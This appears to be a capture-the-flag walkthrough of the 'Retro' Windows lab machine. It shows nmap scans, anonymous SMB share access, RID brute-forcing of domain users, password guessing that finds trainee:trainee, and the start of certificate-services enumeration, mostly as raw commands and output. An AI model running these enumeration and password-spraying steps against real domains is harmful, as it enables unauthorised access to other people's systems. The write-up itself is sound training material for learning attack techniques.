Retro
#easy #windows
Last updated
#easy #windows
Last updated
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49664/tcp open unknown syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49669/tcp open unknown syn-ack ttl 127
62126/tcp open unknown syn-ack ttl 127
62133/tcp open unknown syn-ack ttl 127
62150/tcp open unknown syn-ack ttl 127
62153/tcp open unknown syn-ack ttl 127echo $(cat allPorts.gnmap | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ','; echo) | xclip -sel clipnmap -p 53,88,135,139,389,445,464,593,3268,3269,3389,9389,49664,49667,49669,62126,62133,62150,62153 -sCV -Pn -n -vv 10.129.77.181 -oA openPortsServicesVersionPORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-27 14:29:26Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
| -----BEGIN CERTIFICATE-----
| MIIHDjCCBPagAwIBAgITJgAAAAfu81FFx2Gm5gAAAAAABzANBgkqhkiG9w0BAQsF
| ADBBMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVyZXRybzEU
| MBIGA1UEAxMLcmV0cm8tREMtQ0EwHhcNMjQxMDAyMTAzMzA5WhcNMjUxMDAyMTAz
| MzA5WjAWMRQwEgYDVQQDEwtEQy5yZXRyby52bDCCASIwDQYJKoZIhvcNAQEBBQAD
| ggEPADCCAQoCggEBAKQgOozob26wVFG9KB4eARJjNsNP1XseWS0yc6P1Ukd/oWY7
| rAaiie6nocDLzf733wGlHm51lSLASLn+PyvnWF74oAVUp8e8ifWM4P9gu9dgTyB3
| OV9B0VpWNgiG2xzj4mcFaQchRie/BTqQnLcu+E6oyjY/tXe1JYl+oqR5fcc2Sl0q
| kko2zgT5MDQdiL1wmXthsJnPs60qtNyh1B5BrH0AcIyZdA/Fy+2mu2IEjPy/Blk6
| p5JOqxdi2UI8d4dzqkiMYz/TRJnHOU7dc960TfQy31m07jfFEftHlgG5qAR508R9
| cjjWPLQQhb7AGMQygxuqSY86YtWVtiPxb/36/cECAwEAAaOCAygwggMkMC8GCSsG
| AQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAdBgNV
| HSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgGCSqG
| SIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDALBglg
| hkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQMEAQUw
| BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFIGEF7g9bqbrv9UMHHVtFd3d
| 41WLMB8GA1UdIwQYMBaAFDg6yqfPu6RkQ20kT5QJ8b3pa05eMIHBBgNVHR8Egbkw
| gbYwgbOggbCgga2GgapsZGFwOi8vL0NOPXJldHJvLURDLUNBLENOPURDLENOPUNE
| UCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25m
| aWd1cmF0aW9uLERDPXJldHJvLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxp
| c3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBugYIKwYB
| BQUHAQEEga0wgaowgacGCCsGAQUFBzAChoGabGRhcDovLy9DTj1yZXRyby1EQy1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1yZXRybyxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA3BgNVHREEMDAu
| oB8GCSsGAQQBgjcZAaASBBDIu/wxosKXRLhMW5e5vacqggtEQy5yZXRyby52bDBO
| BgkrBgEEAYI3GQIEQTA/oD0GCisGAQQBgjcZAgGgLwQtUy0xLTUtMjEtMjk4MzU0
| Nzc1NS02OTgyNjAxMzYtNDI4MzkxODE3Mi0xMDAwMA0GCSqGSIb3DQEBCwUAA4IC
| AQCQde+3KP/nqS5VndMf25ysd2szoNnXgG5Z2ftQykp/Ewlh970Hh2DsXr8tZyBW
| mjRxTEwZf9Vv2kX4tEWt5ZEsX0qt1x8pd4bzmkPNRyW1HqPQgwUgz6Dw+U7ocAOi
| lvDIcJt10Tl141s1E1ZuOJR/Vzj3bRwNN3NWWmvjQRsxUZO5P9BX9hHXVd63HDzb
| 1CFrA8BW7JD/pJTLTOsDMgAaJGKCQPrqch3N4et8QZ86q4OkLts3dwT1+OHOX+tm
| dVdtHmtxl2I1M40V3tR8tBZiDfQmaGIXRPx06jQ9I0XrfjE2j4MX+ctmdi9WwTCJ
| jIaHY3lHGvf89i4v1mMea/CSTjF9asNAb9um8Mg4JOz+Ep7AmyNGZuT2SkDTl0je
| RAYc/XTbqCS7x1YzSsz9y8M+Ee0/88xsFKAnonFswb0k66V/kFxe3jPkIFPkPf7p
| gf10rMMlrl1Dn7fachEYqpH6zmnOKZFpQ5XrBP1WgFfbkZCsfAkIRvxl3ko1Ewsv
| syYwTG9Ty5uqlGHRy1MrBAwfq90Uh7BHvwVSe92cRNjSPh/A12bH9cbdjMkJBWIl
| OkrVajdKm88jGH+oe19lEKRkmllRF3tNeBq/I6uXNHSdz9nGgoOBUFfXp0Flsb6w
| i8J0nAjrzqI9PcOutQ0AyVTOHYk0mXUEOVg2h9fz8T5GVQ==
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
| -----BEGIN CERTIFICATE-----
| MIIHDjCCBPagAwIBAgITJgAAAAfu81FFx2Gm5gAAAAAABzANBgkqhkiG9w0BAQsF
| ADBBMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVyZXRybzEU
| MBIGA1UEAxMLcmV0cm8tREMtQ0EwHhcNMjQxMDAyMTAzMzA5WhcNMjUxMDAyMTAz
| MzA5WjAWMRQwEgYDVQQDEwtEQy5yZXRyby52bDCCASIwDQYJKoZIhvcNAQEBBQAD
| ggEPADCCAQoCggEBAKQgOozob26wVFG9KB4eARJjNsNP1XseWS0yc6P1Ukd/oWY7
| rAaiie6nocDLzf733wGlHm51lSLASLn+PyvnWF74oAVUp8e8ifWM4P9gu9dgTyB3
| OV9B0VpWNgiG2xzj4mcFaQchRie/BTqQnLcu+E6oyjY/tXe1JYl+oqR5fcc2Sl0q
| kko2zgT5MDQdiL1wmXthsJnPs60qtNyh1B5BrH0AcIyZdA/Fy+2mu2IEjPy/Blk6
| p5JOqxdi2UI8d4dzqkiMYz/TRJnHOU7dc960TfQy31m07jfFEftHlgG5qAR508R9
| cjjWPLQQhb7AGMQygxuqSY86YtWVtiPxb/36/cECAwEAAaOCAygwggMkMC8GCSsG
| AQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAdBgNV
| HSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgGCSqG
| SIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDALBglg
| hkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQMEAQUw
| BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFIGEF7g9bqbrv9UMHHVtFd3d
| 41WLMB8GA1UdIwQYMBaAFDg6yqfPu6RkQ20kT5QJ8b3pa05eMIHBBgNVHR8Egbkw
| gbYwgbOggbCgga2GgapsZGFwOi8vL0NOPXJldHJvLURDLUNBLENOPURDLENOPUNE
| UCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25m
| aWd1cmF0aW9uLERDPXJldHJvLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxp
| c3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBugYIKwYB
| BQUHAQEEga0wgaowgacGCCsGAQUFBzAChoGabGRhcDovLy9DTj1yZXRyby1EQy1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1yZXRybyxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA3BgNVHREEMDAu
| oB8GCSsGAQQBgjcZAaASBBDIu/wxosKXRLhMW5e5vacqggtEQy5yZXRyby52bDBO
| BgkrBgEEAYI3GQIEQTA/oD0GCisGAQQBgjcZAgGgLwQtUy0xLTUtMjEtMjk4MzU0
| Nzc1NS02OTgyNjAxMzYtNDI4MzkxODE3Mi0xMDAwMA0GCSqGSIb3DQEBCwUAA4IC
| AQCQde+3KP/nqS5VndMf25ysd2szoNnXgG5Z2ftQykp/Ewlh970Hh2DsXr8tZyBW
| mjRxTEwZf9Vv2kX4tEWt5ZEsX0qt1x8pd4bzmkPNRyW1HqPQgwUgz6Dw+U7ocAOi
| lvDIcJt10Tl141s1E1ZuOJR/Vzj3bRwNN3NWWmvjQRsxUZO5P9BX9hHXVd63HDzb
| 1CFrA8BW7JD/pJTLTOsDMgAaJGKCQPrqch3N4et8QZ86q4OkLts3dwT1+OHOX+tm
| dVdtHmtxl2I1M40V3tR8tBZiDfQmaGIXRPx06jQ9I0XrfjE2j4MX+ctmdi9WwTCJ
| jIaHY3lHGvf89i4v1mMea/CSTjF9asNAb9um8Mg4JOz+Ep7AmyNGZuT2SkDTl0je
| RAYc/XTbqCS7x1YzSsz9y8M+Ee0/88xsFKAnonFswb0k66V/kFxe3jPkIFPkPf7p
| gf10rMMlrl1Dn7fachEYqpH6zmnOKZFpQ5XrBP1WgFfbkZCsfAkIRvxl3ko1Ewsv
| syYwTG9Ty5uqlGHRy1MrBAwfq90Uh7BHvwVSe92cRNjSPh/A12bH9cbdjMkJBWIl
| OkrVajdKm88jGH+oe19lEKRkmllRF3tNeBq/I6uXNHSdz9nGgoOBUFfXp0Flsb6w
| i8J0nAjrzqI9PcOutQ0AyVTOHYk0mXUEOVg2h9fz8T5GVQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-02T10:33:09
| Not valid after: 2025-10-02T10:33:09
| MD5: 0570:85e4:2e0b:442c:16c0:d258:3acb:1019
| SHA-1: 0b6c:b037:2581:5555:b186:8ca2:35e7:21db:2c8d:56d6
| -----BEGIN CERTIFICATE-----
| MIIHDjCCBPagAwIBAgITJgAAAAfu81FFx2Gm5gAAAAAABzANBgkqhkiG9w0BAQsF
| ADBBMRIwEAYKCZImiZPyLGQBGRYCdmwxFTATBgoJkiaJk/IsZAEZFgVyZXRybzEU
| MBIGA1UEAxMLcmV0cm8tREMtQ0EwHhcNMjQxMDAyMTAzMzA5WhcNMjUxMDAyMTAz
| MzA5WjAWMRQwEgYDVQQDEwtEQy5yZXRyby52bDCCASIwDQYJKoZIhvcNAQEBBQAD
| ggEPADCCAQoCggEBAKQgOozob26wVFG9KB4eARJjNsNP1XseWS0yc6P1Ukd/oWY7
| rAaiie6nocDLzf733wGlHm51lSLASLn+PyvnWF74oAVUp8e8ifWM4P9gu9dgTyB3
| OV9B0VpWNgiG2xzj4mcFaQchRie/BTqQnLcu+E6oyjY/tXe1JYl+oqR5fcc2Sl0q
| kko2zgT5MDQdiL1wmXthsJnPs60qtNyh1B5BrH0AcIyZdA/Fy+2mu2IEjPy/Blk6
| p5JOqxdi2UI8d4dzqkiMYz/TRJnHOU7dc960TfQy31m07jfFEftHlgG5qAR508R9
| cjjWPLQQhb7AGMQygxuqSY86YtWVtiPxb/36/cECAwEAAaOCAygwggMkMC8GCSsG
| AQQBgjcUAgQiHiAARABvAG0AYQBpAG4AQwBvAG4AdAByAG8AbABsAGUAcjAdBgNV
| HSUEFjAUBggrBgEFBQcDAgYIKwYBBQUHAwEwDgYDVR0PAQH/BAQDAgWgMHgGCSqG
| SIb3DQEJDwRrMGkwDgYIKoZIhvcNAwICAgCAMA4GCCqGSIb3DQMEAgIAgDALBglg
| hkgBZQMEASowCwYJYIZIAWUDBAEtMAsGCWCGSAFlAwQBAjALBglghkgBZQMEAQUw
| BwYFKw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFIGEF7g9bqbrv9UMHHVtFd3d
| 41WLMB8GA1UdIwQYMBaAFDg6yqfPu6RkQ20kT5QJ8b3pa05eMIHBBgNVHR8Egbkw
| gbYwgbOggbCgga2GgapsZGFwOi8vL0NOPXJldHJvLURDLUNBLENOPURDLENOPUNE
| UCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25m
| aWd1cmF0aW9uLERDPXJldHJvLERDPXZsP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxp
| c3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBugYIKwYB
| BQUHAQEEga0wgaowgacGCCsGAQUFBzAChoGabGRhcDovLy9DTj1yZXRyby1EQy1D
| QSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMs
| Q049Q29uZmlndXJhdGlvbixEQz1yZXRybyxEQz12bD9jQUNlcnRpZmljYXRlP2Jh
| c2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA3BgNVHREEMDAu
| oB8GCSsGAQQBgjcZAaASBBDIu/wxosKXRLhMW5e5vacqggtEQy5yZXRyby52bDBO
| BgkrBgEEAYI3GQIEQTA/oD0GCisGAQQBgjcZAgGgLwQtUy0xLTUtMjEtMjk4MzU0
| Nzc1NS02OTgyNjAxMzYtNDI4MzkxODE3Mi0xMDAwMA0GCSqGSIb3DQEBCwUAA4IC
| AQCQde+3KP/nqS5VndMf25ysd2szoNnXgG5Z2ftQykp/Ewlh970Hh2DsXr8tZyBW
| mjRxTEwZf9Vv2kX4tEWt5ZEsX0qt1x8pd4bzmkPNRyW1HqPQgwUgz6Dw+U7ocAOi
| lvDIcJt10Tl141s1E1ZuOJR/Vzj3bRwNN3NWWmvjQRsxUZO5P9BX9hHXVd63HDzb
| 1CFrA8BW7JD/pJTLTOsDMgAaJGKCQPrqch3N4et8QZ86q4OkLts3dwT1+OHOX+tm
| dVdtHmtxl2I1M40V3tR8tBZiDfQmaGIXRPx06jQ9I0XrfjE2j4MX+ctmdi9WwTCJ
| jIaHY3lHGvf89i4v1mMea/CSTjF9asNAb9um8Mg4JOz+Ep7AmyNGZuT2SkDTl0je
| RAYc/XTbqCS7x1YzSsz9y8M+Ee0/88xsFKAnonFswb0k66V/kFxe3jPkIFPkPf7p
| gf10rMMlrl1Dn7fachEYqpH6zmnOKZFpQ5XrBP1WgFfbkZCsfAkIRvxl3ko1Ewsv
| syYwTG9Ty5uqlGHRy1MrBAwfq90Uh7BHvwVSe92cRNjSPh/A12bH9cbdjMkJBWIl
| OkrVajdKm88jGH+oe19lEKRkmllRF3tNeBq/I6uXNHSdz9nGgoOBUFfXp0Flsb6w
| i8J0nAjrzqI9PcOutQ0AyVTOHYk0mXUEOVg2h9fz8T5GVQ==
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
|_ssl-date: 2025-09-27T14:31:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-26T14:20:32
| Not valid after: 2026-03-28T14:20:32
| MD5: b28f:61cd:5240:7e73:d7af:4ec3:c813:668f
| SHA-1: ab2d:49e8:cc99:3d7d:6b09:5674:afbd:9621:fad8:52d5
| -----BEGIN CERTIFICATE-----
| MIIC2jCCAcKgAwIBAgIQR/BWublerKxB3xfOWpiz2TANBgkqhkiG9w0BAQsFADAW
| MRQwEgYDVQQDEwtEQy5yZXRyby52bDAeFw0yNTA5MjYxNDIwMzJaFw0yNjAzMjgx
| NDIwMzJaMBYxFDASBgNVBAMTC0RDLnJldHJvLnZsMIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEA3dxVlNKM/28MeItIIwD6V3EgqeksgJbd4OT/UpOR4zM4
| m4z6vq8GszqN01UWtCh1SJfj7wfJIHCggUlJIC1EJyiVONpfVFQ58iW9u/529/4/
| PB7DL7Yvd+CRpcV3kkfeAOys1YFeQ8dj8R8tQz0/zf84R56U1a5Kl7IjcJ2SkOzB
| 67wCnbvOcQKTkDAv9HU5sXMl0f2Sz2sce34OB1ahXAdNHrsr7hqnm48hohO5BpXy
| x13VXP2lKfExpZexrpy/j3DxxVAFl8L6WBpyVweBWqz9m24IRwrmakrFFc9BAzi3
| vkpgXhERe9r0kzmPElKuCT7yzFydgJFYbMW6v1IIiQIDAQABoyQwIjATBgNVHSUE
| DDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBAHI5
| 9RkFWuHYN7UGp9V2aOErKZr9feSnedC/aYzexxhA8jGDP5NCNx0iJXubhG2Fv9wV
| 5rYHV70leRiE6+OrYMErysu15g8ry6WStwySOzDg91vPBntZl85R6WdT73RNUZrm
| 28hGgdot7+AsokM48RH31/TL64521ZmIqByAC0t4GJ4boWnNmGdwnMcp/v21cMVt
| Jd59T9sm//s4TUmPwgINHG2T9SOmrR0AxwTfJ/1waOwAPQFFe7Lq2Vp9peT/3S0x
| 6kzBbivcHUKRnN8cZDCqUQgmoNcLjoavmLjbFMutCZI5jlzAyAiGHm09ZSWTkADZ
| zNu802gigvfAryfJaVU=
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-27T14:30:22+00:00
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62126/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
62133/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62150/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
62153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 28314/tcp): CLEAN (Timeout)
| Check 2 (port 17432/tcp): CLEAN (Timeout)
| Check 3 (port 62672/udp): CLEAN (Timeout)
| Check 4 (port 26701/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-09-27T14:30:23
|_ start_date: N/Anxc smb 10.129.77.181
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
nxc smb 10.129.77.181 -u 'guest' -p ''
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\guest:
nxc smb 10.129.77.181 -u 'guest' -p '' --shares
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\guest:
SMB 10.129.77.181 445 DC [*] Enumerated shares
SMB 10.129.77.181 445 DC Share Permissions Remark
SMB 10.129.77.181 445 DC ----- ----------- ------
SMB 10.129.77.181 445 DC ADMIN$ Remote Admin
SMB 10.129.77.181 445 DC C$ Default share
SMB 10.129.77.181 445 DC IPC$ READ Remote IPC
SMB 10.129.77.181 445 DC NETLOGON Logon server share
SMB 10.129.77.181 445 DC Notes
SMB 10.129.77.181 445 DC SYSVOL Logon server share
SMB 10.129.77.181 445 DC Trainees READ smbclient //10.129.77.181/Trainees -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 18:58:43 2023
.. DHS 0 Wed Jun 11 11:17:10 2025
Important.txt A 288 Sun Jul 23 19:00:13 2023
4659711 blocks of size 4096. 1281333 blocks available
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)cat Important.txtDear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Adminsnxc smb 10.129.77.181 -u 'guest' -p '' --rid-brute --log nxcSmbRidBrute
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\guest:
SMB 10.129.77.181 445 DC 498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 500: RETRO\Administrator (SidTypeUser)
SMB 10.129.77.181 445 DC 501: RETRO\Guest (SidTypeUser)
SMB 10.129.77.181 445 DC 502: RETRO\krbtgt (SidTypeUser)
SMB 10.129.77.181 445 DC 512: RETRO\Domain Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 513: RETRO\Domain Users (SidTypeGroup)
SMB 10.129.77.181 445 DC 514: RETRO\Domain Guests (SidTypeGroup)
SMB 10.129.77.181 445 DC 515: RETRO\Domain Computers (SidTypeGroup)
SMB 10.129.77.181 445 DC 516: RETRO\Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 517: RETRO\Cert Publishers (SidTypeAlias)
SMB 10.129.77.181 445 DC 518: RETRO\Schema Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 519: RETRO\Enterprise Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.77.181 445 DC 521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.77.181 445 DC 525: RETRO\Protected Users (SidTypeGroup)
SMB 10.129.77.181 445 DC 526: RETRO\Key Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.77.181 445 DC 553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.77.181 445 DC 571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.77.181 445 DC 572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.77.181 445 DC 1000: RETRO\DC$ (SidTypeUser)
SMB 10.129.77.181 445 DC 1101: RETRO\DnsAdmins (SidTypeAlias)
SMB 10.129.77.181 445 DC 1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.77.181 445 DC 1104: RETRO\trainee (SidTypeUser)
SMB 10.129.77.181 445 DC 1106: RETRO\BANKING$ (SidTypeUser)
SMB 10.129.77.181 445 DC 1107: RETRO\jburley (SidTypeUser)
SMB 10.129.77.181 445 DC 1108: RETRO\HelpDesk (SidTypeGroup)
SMB 10.129.77.181 445 DC 1109: RETRO\tblack (SidTypeUser)nxc smb 10.129.77.181 -u users.txt -p trainee --continue-on-success
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [-] retro.vl\Administrator:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\Guest:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\krbtgt:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\DC$:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.77.181 445 DC [-] retro.vl\BANKING$:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\jburley:trainee STATUS_LOGON_FAILURE
SMB 10.129.77.181 445 DC [-] retro.vl\tblack:trainee STATUS_LOGON_FAILURE nxc smb 10.129.77.181 -u trainee -p trainee --shares
SMB 10.129.77.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.77.181 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.77.181 445 DC [*] Enumerated shares
SMB 10.129.77.181 445 DC Share Permissions Remark
SMB 10.129.77.181 445 DC ----- ----------- ------
SMB 10.129.77.181 445 DC ADMIN$ Remote Admin
SMB 10.129.77.181 445 DC C$ Default share
SMB 10.129.77.181 445 DC IPC$ READ Remote IPC
SMB 10.129.77.181 445 DC NETLOGON READ Logon server share
SMB 10.129.77.181 445 DC Notes READ
SMB 10.129.77.181 445 DC SYSVOL READ Logon server share
SMB 10.129.77.181 445 DC Trainees READsmbclient //10.129.77.181/Notes -U trainee
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 9 00:12:49 2025
.. DHS 0 Wed Jun 11 11:17:10 2025
ToDo.txt A 248 Sun Jul 23 19:05:56 2023
user.txt A 32 Wed Apr 9 00:13:01 2025
4659711 blocks of size 4096. 1280260 blocks available
smb: \> get user.txt
getting file \user.txt of size 32 as user.txt (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
smb: \> exit
cat user.txtnxc ldap 10.129.77.181 -u 'banking$' -p password -M adcsLDAP 10.129.77.181 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:retro.vl) (signing:None) (channel binding:Never)
LDAP 10.129.77.181 389 DC [+] retro.vl\banking$:password
ADCS 10.129.77.181 389 DC [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.129.77.181 389 DC Found PKI Enrollment Server: DC.retro.vl
